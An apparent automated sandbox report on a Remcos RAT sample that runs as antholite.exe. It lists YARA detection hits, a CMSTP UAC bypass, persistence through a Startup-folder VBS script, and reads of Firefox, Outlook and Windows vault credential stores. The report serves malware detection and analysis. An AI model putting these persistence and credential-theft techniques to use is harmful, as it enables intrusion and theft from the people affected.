                  Source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@12/14@1/2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007737B5 GetLastError,FormatMessageW,0_2_007737B5
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007610BF AdjustTokenPrivileges,CloseHandle,0_2_007610BF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007616C3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0041798D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008F10BF AdjustTokenPrivileges,CloseHandle,2_2_008F10BF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_008F16C3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008F10BF AdjustTokenPrivileges,CloseHandle,3_2_008F10BF
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_008F16C3
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007751CD
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0078A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0078A67C
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0077648E
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007042A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041AADB
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile created: C:\Users\user\AppData\Local\CoclesJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SM
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile created: C:\Users\user\AppData\Local\Temp\aut930A.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                  Source: Rgh99876k7e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp, antholite.exe, 00000004.00000002.2144383252.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: antholite.exe, 00000003.00000002.2161503913.00000000033F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: antholite.exe, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: Rgh99876k7e.exeReversingLabs: Detection: 63%
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile read: C:\Users\user\Desktop\Rgh99876k7e.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Rgh99876k7e.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe"
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\Desktop\Rgh99876k7e.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Cocles\antholite.exe "C:\Users\user\AppData\Local\Cocles\antholite.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: Rgh99876k7e.exeStatic file information: File size 1521152 > 1048576
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Rgh99876k7e.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Rgh99876k7e.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00720A76 push ecx; ret 0_2_00720A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00457186 push ecx; ret 2_2_00457199
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0045E55D push esi; ret 2_2_0045E566
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00457AA8 push eax; ret 2_2_00457AC6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00434EB6 push ecx; ret 2_2_00434EC9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008B0A76 push ecx; ret 2_2_008B0A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10002806 push ecx; ret 2_2_10002819
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008B0A76 push ecx; ret 3_2_008B0A89
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00406EEB ShellExecuteW,URLDownloadToFileW,2_2_00406EEB
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeFile created: C:\Users\user\AppData\Local\Cocles\antholite.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041AADB
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0071F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0071F98E
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00791C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00791C41
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_008AF98E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00921C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00921C41
